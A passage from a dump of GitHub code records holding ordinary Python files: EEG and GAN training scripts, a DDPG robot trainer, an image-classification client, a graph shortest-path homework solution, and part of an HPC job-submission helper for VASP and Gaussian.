config['dataset']['dataset_root_dir']\n data_path = config['dataset']['train_data_path']\n label_path = config['dataset']['train_label_path']\n train_data_path = os.path.join(root_dir, data_path)\n train_label_path = os.path.join(root_dir, label_path)\n\n label_id = np.load(train_label_path)\n\n train_data = []\n label = []\n\n for children in tqdm(os.listdir(train_data_path), desc= 'Processing', unit= 'child'):\n folder_path = os.path.join(train_data_path, children)\n if int(children) not in test_id:\n child_data = load_data(folder_path)\n train_data.extend(child_data)\n for i in range(len(child_data)):\n label_np = np.zeros(num_classes)\n label_np[label_id[int(children)]] = 1\n label.append(label_np)\n train_data = torch.stack(train_data)\n train_data = train_data.unsqueeze(1)\n label = np.array(label)\n\n print('train_data shape:', train_data.size())\n\n # early_stop_callback = EarlyStopping(\n # monitor='val_loss',\n # min_delta=0.00,\n # patience=20,\n # verbose=True,\n # mode='min',\n # )\n # ckpt_callback = ModelCheckpoint(mode=\"min\",\n # monitor=\"val_loss\",\n # dirpath='./saved_weights',\n # filename='{epoch}-{val_loss:.2f}',\n # every_n_epochs=1)\n \n model = EEGNet_encoder(train_data, label, train_data, label, alpha= config['EEG_net']['alpha'], norm_rate= config['EEG_net']['norm_rate'], learning_rate= config['EEG_net']['learning_rate'])\n\n trainer = pl.Trainer(max_epochs=config['trainer']['max_epochs'],\n accelerator=config['trainer']['accelerator'],\n devices=[2], strategy='ddp')\n \n # trainer.tune(model)\n # print('Learning rate:', model.learning_rate)\n trainer.fit(model)\n\n # print(f'best loss: {ckpt_callback.best_model_score.item():.5g}')\n\n weights = model.state_dict()\n torch.save(weights, config['save_ckpt_path'])\n\n current_time = time.time()\n print('time: ' + str(current_time - old_time) + 's')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Evaluate our model')\n parser.add_argument('--config', type=str, metavar='DIR',\n help='path to a config file')\n args = parser.parse_args()\n main(args)","repo_name":"hoppee21/EEG-ADHD","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25176254416","text":"import os\nimport tqdm\nimport torch\nimport numpy as np\nimport random\nimport argparse\nimport yaml\nfrom torch.utils.data import DataLoader\n\nfrom piad.latent_model import GaussianNoise\nfrom piad.logger import Logger\nfrom piad.networks import ResNetGenerator, ResNetEncoder, LatentDiscriminator\nfrom piad.datasets import create_dataset, create_transform, inf_dataloader\nfrom piad.optimizer import Optimizer\nfrom piad.adv_losses import WassersteinLoss\nfrom piad.rec_losses import PerceptualLoss\n\n\nclass PIADTrainer:\n def __init__(self, config):\n self.config = config\n\n if config['random_seed'] is not None:\n torch.manual_seed(config['random_seed'])\n torch.cuda.manual_seed(config['random_seed'])\n np.random.seed(config['random_seed'])\n random.seed(config['random_seed'])\n torch.backends.cudnn.deterministic = True\n\n self.verbose = config['verbose']\n output_root = os.path.join(config['output_root'], str(config[\"normal_class\"]), str(config[\"run\"]))\n self.checkpoint_root = os.path.join(output_root, 'checkpoint')\n self.log_root = os.path.join(output_root, 'logs')\n\n self.logger = Logger(self.log_root)\n\n self.image_res = config['image_res']\n self.image_dim = config['image_dim']\n self.latent_res = config['latent_res']\n self.latent_dim = config['latent_dim']\n\n self.iters = config['iters']\n self.log_iter = config['log_iter']\n self.checkpoint_iter = config['checkpoint_iter']\n self.image_sample_iter = config['image_sample_iter']\n self.update_grad_norm_iter = config.get('update_grad_norm_iter', 500)\n\n self.batch_size = config['batch_size']\n self.n_dis = config['n_dis']\n assert self.n_dis >= 1\n\n \"=========================================== create data model ================================================\"\n\n dataset_type = config['dataset_type']\n dataset_root = config['dataset_root']\n transform = create_transform(dataset_type)\n train_dataset = create_dataset(dataset_type, dataset_root, 'train', config[\"normal_class\"], normal=True,\n transform=transform, extra_dataset_params=config.get(\"extra_dataset_params\"))\n self.image_model = inf_dataloader(\n DataLoader(train_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True,\n num_workers=config['num_workers'])\n )\n\n \"=========================================== create latent model ==============================================\"\n\n self.latent_model = GaussianNoise(self.latent_dim, self.latent_res, self.batch_size)\n\n \"============================================= create networks ================================================\"\n\n self.gen = ResNetGenerator(self.image_res, self.image_dim, self.latent_res, self.latent_dim, config['gen']).cuda()\n self.enc = ResNetEncoder(self.image_res, self.image_dim, self.latent_res, self.latent_dim, config['enc']).cuda()\n self.image_dis = ResNetEncoder(self.image_res, self.image_dim, 1, 1, config['image_dis'], use_mbstddev=True).cuda()\n self.latent_dis = LatentDiscriminator(\n input_dim=self.latent_dim * self.latent_res * self.latent_res,\n inner_dims=config['latent_dis']).cuda()\n\n if self.verbose:\n print(\"====================== Generator ===========================\")\n print(self.gen)\n print(\"====================== Image discriminator ===================\")\n print(self.image_dis)\n print(\"====================== Encoder =============================\")\n print(self.enc)\n print(\"====================== Latent discriminator================\")\n print(self.latent_dis)\n\n \"=========================================== create losses ====================================================\"\n\n image_adv_loss = WassersteinLoss(**config['wasserstein_loss_kwargs'])\n latent_adv_loss = WassersteinLoss(**config['wasserstein_loss_kwargs'])\n res_loss = PerceptualLoss(**config['perceptual_loss_kwargs'], reduction='mean')\n\n \"=========================================== create optimizers ================================================\"\n\n self.optimizer = Optimizer(\n gen_params=self.gen.parameters(),\n enc_params=self.enc.parameters(),\n image_dis_params=self.image_dis.parameters(),\n latent_dis_params=self.latent_dis.parameters(),\n image_adv_loss=image_adv_loss,\n latent_adv_loss=latent_adv_loss,\n rec_loss=res_loss,\n adam_kwargs=config['adam_kwargs'],\n enc_rec_loss_weight=config['enc_rec_loss_weight'],\n gen_rec_loss_weight=config['gen_rec_loss_weight'],\n use_grad_norm_policy=config['use_grad_norm_policy']\n ).cuda()\n\n \"=========================================== data for logging =================================================\"\n\n self.n_image_for_visualization = 5\n self.display_z = next(self.latent_model)[:self.n_image_for_visualization].cpu().detach()\n self.display_x = next(self.image_model)[:self.n_image_for_visualization].cpu().detach()\n\n \"=========================================== initialize =======================================================\"\n\n self.tqdm_logger = tqdm.tqdm(total=self.iters)\n\n if config['finetune_from'] is not None:\n self.load_state(torch.load(config['finetune_from']))\n\n def train(self):\n while self.tqdm_logger.n < self.tqdm_logger.total:\n self.tqdm_logger.update(1)\n\n \"=========================================== train step ===================================================\"\n\n for _ in range(self.n_dis):\n real_z = next(self.latent_model).cuda()\n real_x = next(self.image_model).cuda()\n fake_x = self.gen(real_z.detach())\n fake_z = self.enc(real_x)\n\n image_dis_losses = self.optimizer.compute_image_dis_loss(self.image_dis, real_x, fake_x, update_parameters=True)\n latent_dis_losses = self.optimizer.compute_latent_dis_loss(self.latent_dis, real_z, fake_z, update_parameters=True)\n\n real_z = next(self.latent_model).cuda()\n real_x = next(self.image_model).cuda()\n\n fake_x = self.gen(real_z)\n fake_z = self.enc(real_x)\n rec_x = self.gen(fake_z)\n\n gen_enc_losses = self.optimizer.compute_enc_gen_loss(\n self.enc, self.gen, self.latent_dis, self.image_dis,\n fake_x, real_x, fake_z, rec_x,\n update_parameters=True,\n logger=self.logger,\n n_iter=self.tqdm_logger.n,\n update_grads=self._if_time_to_react(self.update_grad_norm_iter)\n )\n\n del real_z, real_x, fake_z, fake_x, rec_x\n\n \"============================================== logging ===================================================\"\n\n if self._if_time_to_react(self.log_iter):\n self.logger.add_scalars('train/image_dis', image_dis_losses, self.tqdm_logger.n)\n self.logger.add_scalars('train/latent_dis', latent_dis_losses, self.tqdm_logger.n)\n self.logger.add_scalars('train/gen_enc', gen_enc_losses, self.tqdm_logger.n)\n\n if self._if_time_to_react(self.image_sample_iter):\n self._save_image_sample()\n\n \"============================================ checkpoint ==================================================\"\n\n if self._if_time_to_react(self.checkpoint_iter):\n self._do_checkpoint()\n\n self._do_checkpoint()\n\n def get_state(self):\n return {\n 'config': self.config,\n 'n_iter': self.tqdm_logger.n,\n 'gen': self.gen.state_dict(),\n 'enc': self.enc.state_dict(),\n 'latent_dis': self.latent_dis.state_dict(),\n 'image_dis': self.image_dis.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'display_z': self.display_z.data,\n 'display_x': self.display_x.data,\n }\n\n def load_state(self, state):\n self.display_z.data = state['display_z']\n self.display_x.data = state['display_x']\n\n self.gen.load_model_state(state['gen'])\n self.enc.load_model_state(state['enc'])\n self.latent_dis.load_model_state(state['latent_dis'])\n self.image_dis.load_model_state(state['image_dis'])\n self.optimizer.load_opt_state(state['optimizer'])\n\n self.tqdm_logger.update(state['n_iter'])\n\n def _if_time_to_react(self, every_iter):\n return self.tqdm_logger.n % every_iter == 0\n\n def _do_checkpoint(self):\n os.makedirs(self.checkpoint_root, exist_ok=True)\n checkpoint_path = os.path.join(self.checkpoint_root, f'iter_{self.tqdm_logger.n:07d}.tar')\n torch.save(self.get_state(), checkpoint_path)\n\n checkpoint_path = os.path.join(self.checkpoint_root, 'latest.tar')\n torch.save(self.get_state(), checkpoint_path)\n\n def _save_image_sample(self):\n torch.set_grad_enabled(False)\n self.optimizer.eval()\n\n images = torch.cat([\n self.gen(self.display_z.cuda()).cpu().detach(),\n self.display_x,\n self.gen(self.enc(self.display_x.cuda())).cpu().detach()\n ], 0)\n\n name = f'iter_{self.tqdm_logger.n:07d}.png'\n self.logger.save_image_samples(images, grid_size=self.image_res * self.n_image_for_visualization,\n name=name, nrow=self.n_image_for_visualization)\n self.logger.save_image_samples(images, grid_size=self.image_res * self.n_image_for_visualization,\n name='sample.png', nrow=self.n_image_for_visualization)\n\n torch.set_grad_enabled(True)\n self.optimizer.train()\n\n\ndef train(config, normal_class, run):\n config['normal_class'] = normal_class\n config['run'] = run\n\n trainer = PIADTrainer(config)\n trainer.train()\n\n\ndef main():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('config', type=str, help='Path to config')\n parser.add_argument('normal_class', type=int, help='Normal class')\n parser.add_argument('run', type=int, help='# of run')\n args = parser.parse_args()\n\n with open(args.config, 'r') as stream:\n config = yaml.load(stream, Loader=yaml.FullLoader)\n\n train(config, args.normal_class, args.run)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ninatu/piad","sub_path":"piad/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10753,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"6361541686","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPepper Train offline a Model with given training_sets.\n\"\"\"\nimport json\nimport random\nimport time\nimport tensorflow as tf\nimport numpy as np\n\nfrom Settings import *\nfrom ddpg.ddpg import ActorNetwork, CriticNetwork, OrnsteinUhlenbeckActionNoise, ReplayBuffer, build_summaries\n\n\ndef trainFromDataset(sess, args, actor, critic, actor_noise, update_model, saver):\n # Set up summary Ops\n summary_ops, summary_vars = build_summaries()\n\n if update_model == False:\n sess.run(tf.global_variables_initializer())\n # Initialize target network weights\n actor.update_target_network()\n critic.update_target_network()\n\n writer = tf.summary.FileWriter(args['summary_dir'], sess.graph)\n # Initialize replay memory\n replay_buffer = ReplayBuffer(int(args['buffer_size']), int(args['random_seed']))\n file = open(TRAINING_FILE)\n datasets = json.load(file)['steps']\n file.close()\n\n for i in range(int(args['max_episodes'])):\n ep_reward = 0\n ep_ave_max_q = 0\n startTime = time.clock()\n for j in range(int(args['max_episode_len'])):\n\n randomnumber = random.randint(0, len(datasets) - 1)\n p = datasets[randomnumber]\n s = [p['az'], p['ad']]\n a = p['actionR']\n s2 = [p['fz'], p['fd']]\n r = p['rw']\n replay_buffer.add(np.reshape(s, (actor.s_dim,)), np.reshape(a, (actor.a_dim,)), r,\n False, np.reshape(s2, (actor.s_dim,)))\n\n # Keep adding experience to the memory until\n # there are at least minibatch size samples\n if replay_buffer.size() > int(args['minibatch_size']):\n s_batch, a_batch, r_batch, t_batch, s2_batch = \\\n replay_buffer.sample_batch(int(args['minibatch_size']))\n\n # Calculate targets\n target_q = critic.predict_target(\n s2_batch, actor.predict_target(s2_batch))\n\n y_i = []\n for k in range(int(args['minibatch_size'])):\n if t_batch[k]:\n y_i.append(r_batch[k])\n else:\n y_i.append(r_batch[k] + critic.gamma * target_q[k])\n\n # Update the critic given the targets\n predicted_q_value, _ = critic.train(\n s_batch, a_batch, np.reshape(y_i, (int(args['minibatch_size']), 1)))\n\n ep_ave_max_q += np.amax(predicted_q_value)\n\n # Update the actor policy using the sampled gradient\n a_outs = actor.predict(s_batch)\n grads = critic.action_gradients(s_batch, a_outs)\n actor.train(s_batch, grads[0])\n\n # Update target networks\n actor.update_target_network()\n critic.update_target_network()\n\n ep_reward += r\n print(\"Episode: \" + str(i) + \"\\t\" + str(ep_reward / args['max_episode_len']) + \"\\tbeendet in\\t\" + str(\n time.clock() - startTime) + \"s\")\n if i % int(args['save']) == 0 and i != 0:\n print('Saving model')\n filename = args['model'] + \"_\" + str(i) + \"/model\"\n saver.save(sess, filename)\n\n\ndef main():\n print(\"Doing Offline Training\")\n with tf.Session() as sess:\n np.random.seed(int(args['random_seed']))\n tf.set_random_seed(int(args['random_seed']))\n\n actor = ActorNetwork(sess, state_dim, action_dim, action_bound,\n float(args['actor_lr']), float(args['tau']),\n int(args['minibatch_size']))\n\n critic = CriticNetwork(sess, state_dim, action_dim,\n float(args['critic_lr']), float(args['tau']),\n float(args['gamma']),\n actor.get_num_trainable_vars())\n actor_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(action_dim))\n\n saver = tf.train.Saver()\n trainFromDataset(sess, args, actor, critic, actor_noise, False, saver)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mhinkelmann/Pepper_RL","sub_path":"src/pepper_ddpg_offline_trainer.py","file_name":"pepper_ddpg_offline_trainer.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27884533057","text":"import json\nimport base64\nimport requests\nimport os\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n '--port',\n type=int,\n default=8000,\n help='The port that the server is running on'\n)\nparser.add_argument(\n '--directory',\n type=str,\n default='data',\n help='The directory that stores cat and dog images'\n)\nargs = parser.parse_args()\n\nurl = f'http://127.0.0.1:{args.port}/predict'\ndirectory = f'./{args.directory}'\ninput = {'photos': []}\n\nfor image in os.listdir(directory):\n with open(f'{directory}/{image}', 'rb') as image_file:\n encoding = base64.b64encode(image_file.read()).decode('utf-8')\n image_dict = {'ID': image, 'img_code': encoding}\n input['photos'].append(image_dict)\n\nresponse = requests.post(url, data=json.dumps(input))\n\ndf = pd.DataFrame(response.json()['results'])\ncat_tp = 0\ndog_tp = 0\nfor i in df.index:\n if df['ID'][i].split('.')[0] == 'cat' and df['cat_prob'][i] >= 0.5:\n cat_tp += 1\n if df['ID'][i].split('.')[0] == 'dog' and df['dog_prob'][i] > 0.5:\n dog_tp += 1\ntp = pd.DataFrame({'cat_tp': [cat_tp], 'dog_tp': [dog_tp]})\n\nwriter = pd.ExcelWriter('./analysis.xlsx', engine='xlsxwriter')\ndf.to_excel(writer, sheet_name='Probabilities', index=False)\ntp.to_excel(writer, sheet_name='Analysis', index=False)\nwriter.close()","repo_name":"dimitlee/CatDog","sub_path":"request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40786752045","text":"from kol2btesty import runtests\nimport heapq\ndef min_cost( O, C, T, L ):\n \n # tu prosze wpisac wlasna implementacje\n cost_on_parking = {}\n\n for i in range(len(O)):\n cost_on_parking[O[i]] = C[i] \n O.sort()\n G = {elem:[] for elem in O}\n A =0 \n\n G[A] = [] #punkt startowy!\n G[L] = [] #punkt koncowy\n i = 0 \n while i < len(O) and O[i] <=T:\n G[A].append((O[i],cost_on_parking[O[i]],0)) #0 na koncu oznacza ze nie wykorzystany zostal dodatkowy warunek\n i+=1\n while i < len(O) and O[i] <= 2*T:\n G[A].append((O[i],cost_on_parking[O[i]],1)) #1 na koncu oznacza ze wykorzystany zostal dodatkowy warunek\n i+=1\n if L < T:\n G[A].append((L,0,0))\n elif L < 2*T:\n G[A].append((L,0,1))\n \n for ind,elem in enumerate(O):\n i = ind+1\n while i < len(O) and O[i] - elem <=T:\n G[elem].append((O[i],cost_on_parking[O[i]],0)) #0 na koncu oznacza ze nie wykorzystany zostal dodatkowy warunek\n i+=1\n while i < len(O) and O[i] - elem <= 2*T:\n G[elem].append((O[i],cost_on_parking[O[i]],1)) #1 na koncu oznacza ze wykorzystany zostal dodatkowy warunek\n i+=1\n if L - elem < T:\n G[elem].append((L,0,0))\n elif L - elem <= 2*T:\n G[elem].append((L,0,1))\n \n\n dist = {elem:[float(\"inf\"),float(\"inf\")] for elem in G}\n dist[A][0] = 0\n visited = {elem:[False,False] for elem in G}\n q = [(0,A,0)] #(dist,A,0) # 0 oznacza ze nie wykorzystalismy krawedzi 2T\n # jesli flag == 1 to wykorzystana zostala juz krawedz 2T\n # czyli teraz juz bedziemy musieli zawsze utrzymywac flagę flag == 1 przy dodawaniu wierzcholkow do kolejki\n while q:\n cost,u,flag = heapq.heappop(q)\n if visited[u][flag]:continue\n visited[u][flag] = True\n for v,w,f in G[u]:\n if f == 0: #ten przypadek jest dla dowolnej naszej flagi \n if flag == 1:\n if dist[u][1] + w < dist[v][1]:\n dist[v][1] = dist[u][1] + w\n heapq.heappush(q,(dist[v][1],v,1)) #dodajemy flag zamiast f gdyz, jesli flag == 1 to \n # musimy przekazac flag == 1 tez do kolejki! a jesli flag == 0 no to tutaj tez dajemy flag == 1\n else:\n if dist[u][0] + w < dist[v][0]:\n dist[v][0] = dist[u][0] + w\n heapq.heappush(q,(dist[v][0],v,0))\n \n\n elif flag == 0: #jesli f == 1 oraz nie wykorzystalismy jeszcze krawedzi czyli flag == 0, to mozemy ją tutaj wykorzystac\n if dist[u][0] + w < dist[v][1]:\n dist[v][1] = dist[u][0] + w\n heapq.heappush(q,(dist[v][1],v,1)) #dodajemy 1 bo wykorzystalismy w tej chwili krawedz! \n \n return min(dist[L][1], dist[L][0])\n\n#zmien all_tests na True zeby uruchomic wszystkie testy\nruntests( min_cost, all_tests = True )\n","repo_name":"Adam0s007/DSA","sub_path":"tests-2022/kol2_b_dynamic/kol2b.py","file_name":"kol2b.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8527631910","text":"import os, sys\nfrom subprocess import call as shl\nfrom collections import OrderedDict\nimport yaml\nimport time\ndef represent_dictionary_order(self, dict_data):\n return self.represent_mapping('tag:yaml.org,2002:map', dict_data.items())\nyaml.add_representer(OrderedDict, represent_dictionary_order)\n\n# -- version chk\nversion = sys.version\nif version[0] == '3':\n raw_input = input\n\n# -------------------- Config ---------------------#\n\"\"\"\nUp to own HPC system\n\"\"\"\n\nSGE_submit_file_framework = \"\"\"#!/bin/csh\n#$ -q {qname}\n#$ -N {jobname}\n#$ -pe mpi_{ncpu} {ncpu}\n#$ -V\n#$ -cwd\n\"\"\"\n\nPBS_submit_file_framework = \"\"\"#!/bin/sh -x\n#PBS -l select={nselect}:ncpus={ncpu}:mpiprocs={ncpu}:Qlist=vasp\n#PBS -q {qname}\n#PBS -N {jobname}\n\ncd $PBS_O_WORKDIR\n\nnodes=`cat $PBS_NODEFILE` # Nodes in job\n\njobidcut=`echo $PBS_JOBID|cut -d. -f1`\n bhosts=bhosts\n lamhosts=lamhosts\n rm -f $bhosts\n rm -f $lamhosts.*\n #Need to truncate anything after a '.'\n nodes=`echo $nodes | sed 's/\\.\\w*//g'`\n for node in $nodes; do\n nodecut=`echo $node|cut -d- -f1`\n echo \"$nodecut slots=${{NCPUS}}\" >> $bhosts\n done\n\nsource /opt/intel/oneapi/setvars.sh\nexport LD_LIBRARY_PATH=/usr/apps/openmpi_1_8/lib:/usr/apps/fftw-2.1.5/double/lib:$LD_LIBRARY_PATH\nexport PATH=/opt/intel/oneapi/mpi/2021.4.0/bin:$PATH\nNP=`/usr/bin/wc -l $PBS_NODEFILE | awk '{{ print $1 }}'`\n\"\"\" \n\nSlurm_submit_file_framework = \"\"\n\nclass JobSubmit:\n def __init__(self, inputfile, queue, n_of_cpu, node=None, init_only=False):\n self.inputfile = inputfile\n home = os.getenv(\"HOME\")\n # -- read configs from queue_config.yaml\n user_queue_config = f\"{home}/.CCpy/queue_config.yaml\"\n if not os.path.isfile(user_queue_config):\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n default_queue_config = str(MODULE_DIR) + \"/queue_config.yaml\"\n if \".CCpy\" not in os.listdir(home):\n os.mkdir(f\"{home}/.CCpy\")\n os.system(f\"cp {default_queue_config} {user_queue_config}\")\n\n if init_only:\n return\n\n yaml_string = open(user_queue_config, \"r\").read()\n queue_config = yaml.load(yaml_string)\n self.queue_config = queue_config\n \n\n # -- Queue and nodes settings\n try:\n CCpy_SCHEDULER_CONFIG = os.environ['CCpy_SCHEDULER_CONFIG']\n except:\n print('''Error while load $CCpy_SCHEDULER_CONFIG file.\n Please check the example of scheduler config file at https://github.com/91bsjun/CCpy/tree/master/CCpy/Queue''')\n quit()\n scheduler_config = yaml.load(open(CCpy_SCHEDULER_CONFIG, 'r'))\n\n if queue not in scheduler_config['queue'].keys():\n print(f\"'{queue}' queue argument is not in queue configuration file ({CCpy_SCHEDULER_CONFIG}), \\nCurrent available:\", list(scheduler_config['queue'].keys()))\n quit()\n\n cpu = scheduler_config['queue'][queue]['ncpu']\n mem = scheduler_config['queue'][queue]['mem']\n q = scheduler_config['queue'][queue]['q_name']\n\n self.cpu = cpu\n self.mem = mem\n self.q = q\n self.n_of_nodes = 1 # select multi nodes\n if n_of_cpu:\n self.n_of_cpu = n_of_cpu\n else:\n self.n_of_cpu = cpu\n self.divided = cpu / self.n_of_cpu\n if self.n_of_cpu > cpu: # select multi nodes\n self.n_of_nodes = int(self.n_of_cpu / cpu) # select multi nodes\n\n self.qsub = queue_config['qsub']\n\n self.python_path = queue_config['python_path']\n self.mpi_run = queue_config['mpi_run']\n\n self.atk_mpi_run = queue_config['atk_mpi_run']\n\n self.vasp_path = queue_config['vasp_path']\n# >>>>>>>>>>>>>>>>>>>>>>> !!! modify below line up to your system !!! <<<<<<<<<<<<<<<<<<<<<<<<< #\n self.vasp_run = f\"{self.mpi_run} -launcher rsh -np $NP -machinefile $PBS_NODEFILE {self.vasp_path} < /dev/null > vasp.out\" # !!!! <-- HMC vasp run type\n # self.vasp_run = f\"{self.mpi_run} -np $NSLOTS {self.vasp_path} < /dev/null > vasp.out\" # !!!! <-- CMS vasp run type\n\n self.g09_path = queue_config['g09_path']\n self.atk_path = queue_config['atk_path']\n\n self.lammps_mpirun_path = self.mpi_run\n self.lammps_path = queue_config['lammps_path']\n \n self.siesta_path = queue_config['siesta_path']\n\n # -- queue settings\n #self.pe_request = \"#$ -pe mpi_%d %d\" % (self.n_of_cpu, self.n_of_cpu)\n #self.queue_name = \"#$ -q %s\" % self.q if self.q else \"\"\n\n self.scheduler_type = scheduler_config['scheduler_type']\n\n if self.scheduler_type == \"PBS\":\n mpi = PBS_submit_file_framework\n elif self.scheduler_type == \"SGE\":\n mpi = SGE_submit_file_framework\n elif self.scheduler_type == \"Slurm\":\n mpi = Slurm_submit_file_framework\n\n if node and self.scheduler_type == \"SGE\":\n mpi += f\"#$ -l h={node}\\n\"\n \n self.mpi = mpi\n \n \n\n def gaussian(self, ):\n inputfile = self.inputfile\n cpu, mem, q = self.n_of_cpu, self.mem, self.q\n d = self.divided\n\n mem = int(mem / d)\n\n f = open(inputfile, \"r\")\n lines = f.readlines()\n f.close()\n\n f = open(inputfile, \"w\")\n for line in lines:\n if \"%nproc=\" in line:\n f.write(\"%nproc=\" + str(cpu) + \"\\n\")\n elif \"%mem=\" in line:\n f.write(\"%mem=\" + str(mem) + \"Gb\\n\")\n else:\n f.write(line)\n f.close()\n\n jobname = \"G\" + inputfile.replace(\".com\", \"\")\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", \"_\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu)\n mpi += f\"{self.g09_path} {inputfile}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def gaussian_batch(self, input_files):\n cpu, mem, q = self.n_of_cpu, self.mem, self.q\n d = self.divided\n\n mem = int(mem / d)\n\n for inputfile in input_files:\n f = open(inputfile, \"r\")\n lines = f.readlines()\n f.close()\n\n f = open(inputfile, \"w\")\n for line in lines:\n if \"%nproc=\" in line:\n f.write(\"%nproc=\" + str(cpu) + \"\\n\")\n elif \"%mem=\" in line:\n f.write(\"%mem=\" + str(mem) + \"Gb\\n\")\n else:\n f.write(line)\n f.close()\n\n jobname = raw_input(\"Jobname for this job \\n: \")\n runs = \"\"\n for each_input in input_files:\n runs += \"%s %s\\nsleep 10\\n\" % (self.g09_path, each_input)\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu)\n mpi += runs\n\n mpi_filename = \"mpi_%s.sh\" % jobname\n f = open(mpi_filename, \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" %s\" % mpi_filename, shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n\n def vasp(self, band=False, dirpath=None, loop=False, sequence=False, refine_poscar=False):\n inputfile = self.inputfile\n\n #vasp_run = self.vasp_run\n # -- Band calculation after previous calculation\n if band:\n jobname = \"VB\" + inputfile\n elif loop:\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n loop_opt_script = str(MODULE_DIR) + \"/../Package/VASPOptLoop.py\"\n os.system(f'cp {loop_opt_script} ./.VASPOptLoop.py')\n script_filename = \".VASPOptLoop.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n # self.vasp_run = \"%s %s\\nrm %s\" % (self.python_path, script_path, script_path)\n self.vasp_run = f\"{self.python_path} {script_path}\"\n jobname = \"VL\" + inputfile\n elif sequence:\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n sequence_job_script = str(MODULE_DIR) + \"/../Package/VASPSequenceJobs.py\"\n os.system(f'cp {sequence_job_script} ./.VASPSequenceJobs.py')\n script_filename = \".VASPSequenceJobs.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n \n sequence_file = sequence\n\n loop_opt_script = str(MODULE_DIR) + \"/../Package/VASPOptLoop.py\"\n os.system(f'cp {loop_opt_script} ./.VASPOptLoop.py')\n loop_opt_script_filename = \".VASPOptLoop.py\"\n loop_opt_script_path = os.getcwd() + \"/\" + loop_opt_script_filename\n \n self.vasp_run = f\"{self.python_path} {script_path} {inputfile} {sequence_file} {self.python_path} {loop_opt_script_path} {refine_poscar}\"\n jobname = \"VLS\" + inputfile\n else:\n jobname = \"V\" + inputfile\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", \"_\").replace(\"/\", \"_\").replace(\"(\", \"_\").replace(\")\", \"_\")\n \n tmp_dirpath = dirpath.replace(\"(\", \"\\(\").replace(\")\", \"\\)\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n if not sequence:\n mpi += f\"cd {tmp_dirpath} \\n\"\n mpi += f\"{self.vasp_run}\\n\"\n mpi += \"touch vasp.done \\n\"\n\n pwd = os.getcwd()\n os.chdir(dirpath)\n if 'vasp.done' in os.listdir():\n os.remove('vasp.done')\n else:\n mpi += f\"{self.vasp_run}\\n\"\n mpi_filename = f\"mpi_{jobname}.sh\"\n f = open(mpi_filename, \"w\")\n f.write(mpi)\n f.close()\n shl(f\"{self.qsub} {mpi_filename}\", shell=True)\n time.sleep(0.5)\n #shl(\"rm -rf ./%s\" % mpi_filename, shell=True)\n #os.chdir(pwd)\n\n def vasp_batch(self, dirs=None, scratch=False, loop=False, jobname=None, sequence=False, refine_poscar=False):\n \"\"\"\n Run multiple VASP jobs in a single queue\n \"\"\"\n if not jobname:\n jobname = raw_input(\"Jobname for this job \\n: \")\n\n runs = \"\"\n script_path = None\n\n pwd = os.getcwd()\n if loop:\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n loop_opt_script = str(MODULE_DIR) + \"/../Package/VASPOptLoop.py\"\n os.system(f'cp {loop_opt_script} ./.VASPOptLoop.py')\n script_filename = \".VASPOptLoop.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n each_run = f\"{self.python_path} {script_path}\\n\"\n each_run += \"touch vasp.done\\n\"\n each_run += \"sleep 30\\n\"\n elif sequence:\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n sequence_job_script = str(MODULE_DIR) + \"/../Package/VASPSequenceJobs.py\"\n os.system(f'cp {sequence_job_script} ./.VASPSequenceJobs.py')\n script_filename = \".VASPSequenceJobs.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n sequence_file = sequence\n\n loop_opt_script = str(MODULE_DIR) + \"/../Package/VASPOptLoop.py\"\n os.system(f'cp {loop_opt_script} ./.VASPOptLoop.py')\n loop_opt_script_filename = \".VASPOptLoop.py\"\n loop_opt_script_path = os.getcwd() + \"/\" + 